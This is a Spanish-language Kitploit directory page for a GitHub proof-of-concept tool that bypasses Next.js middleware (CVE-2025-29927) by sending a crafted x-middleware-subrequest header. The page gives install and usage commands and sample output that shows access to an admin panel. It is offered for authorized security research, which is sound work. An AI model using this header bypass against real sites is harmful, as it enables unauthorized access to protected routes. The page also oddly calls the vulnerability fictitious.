Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
PoC-for-Next.js-Middleware — > 🔓 Prueba de concepto de un bypass ficticio de middleware de Next.js (CVE-2025-29927): elabora sub-solicitudes para probar rutas protegidas. | Kitploit
Herramientas/GitHubGitHub/m2hcz/poc-for-next.js-middleware
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y Educación
GitHubm2hcz/poc-for-next.js-middleware

PoC-for-Next.js-Middleware

> 🔓 Prueba de concepto de un bypass ficticio de middleware de Next.js (CVE-2025-29927): elabora sub-solicitudes para probar rutas protegidas.

Ver Repositorio
147hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

PoC para el bypass del middleware de Next.js (CVE-2025-29927)

Python Version Status

Esta es una prueba de concepto para una vulnerabilidad ficticia de omisión del middleware de Next.js (CVE-2025-29927). Úselo solo con fines educativos y de investigación de seguridad autorizada.


🚀 Características

CaracterísticaDescripción
✨ Color y modo verbosoSalida con códigos de color; -v para registros de depuración detallados.
📦 Estructura OOPDiseño basado en clases para mayor claridad y mantenibilidad.
🌐 Soporte de proxyEnruta el tráfico a través de proxies HTTP(S) mediante --proxy.
🍪 Manejo de sesionesrequests.Session persistente para reutilización de cookies y conexiones.
🚦 Control de redireccionesSin seguimiento de redirecciones de forma predeterminada; detecta claramente éxito vs. fallo.
🛠 Encabezados personalizadosSobrescribe User-Agent, x-middleware-subrequest o añade encabezados.

⚡ Instalación

root@kitploit:~
# Clone repository
git clone https://github.com/your-username/nextjs-middleware-poc.git
cd nextjs-middleware-poc

# (Optional) Create virtual environment
python3 -m venv .venv
source .venv/bin/activate

# Install dependencies
pip install -r requirements.txt

Requiere Python 3.7+


🎯 Uso

root@kitploit:~
python poc.py [options] <host>[:port]
OpciónDescripción
-p, --path PATHRuta protegida (predeterminada: /admin)
-s, --scheme {http,https}Protocolo (predeterminado: http)
--header HEADERValor del encabezado x-middleware-subrequest (predeterminado: middleware:middleware)
-ua, --user-agent AGENTUser-Agent personalizado (predeterminado: Mozilla/5.0)
--proxy PROXYURL de proxy HTTP(S) (p. ej., http://127.0.0.1:8080)
-v, --verboseHabilita la salida de depuración
-h, --helpMuestra este mensaje de ayuda

🔍 Ejemplos

1. Prueba básica

root@kitploit:~
python poc.py localhost:3000

2. HTTPS y ruta personalizada

root@kitploit:~
python poc.py example.com -s https -p /dashboard

3. Proxy y modo verboso

root@kitploit:~
python poc.py internal-app:8080 --proxy http://127.0.0.1:8080 -v

✅ Salida esperada

Éxito

root@kitploit:~
[*] Target URL: http://localhost:3000/admin
[+] SUCCESS: Middleware bypassed — access granted!
--- Response Snippet ---
<!DOCTYPE html><html>…<title>Admin Panel</title>…

Fallo

root@kitploit:~
[*] Target URL: http://localhost:3000/admin
[-] FAIL: Access denied by middleware (302 Redirect)
Descargar herramienta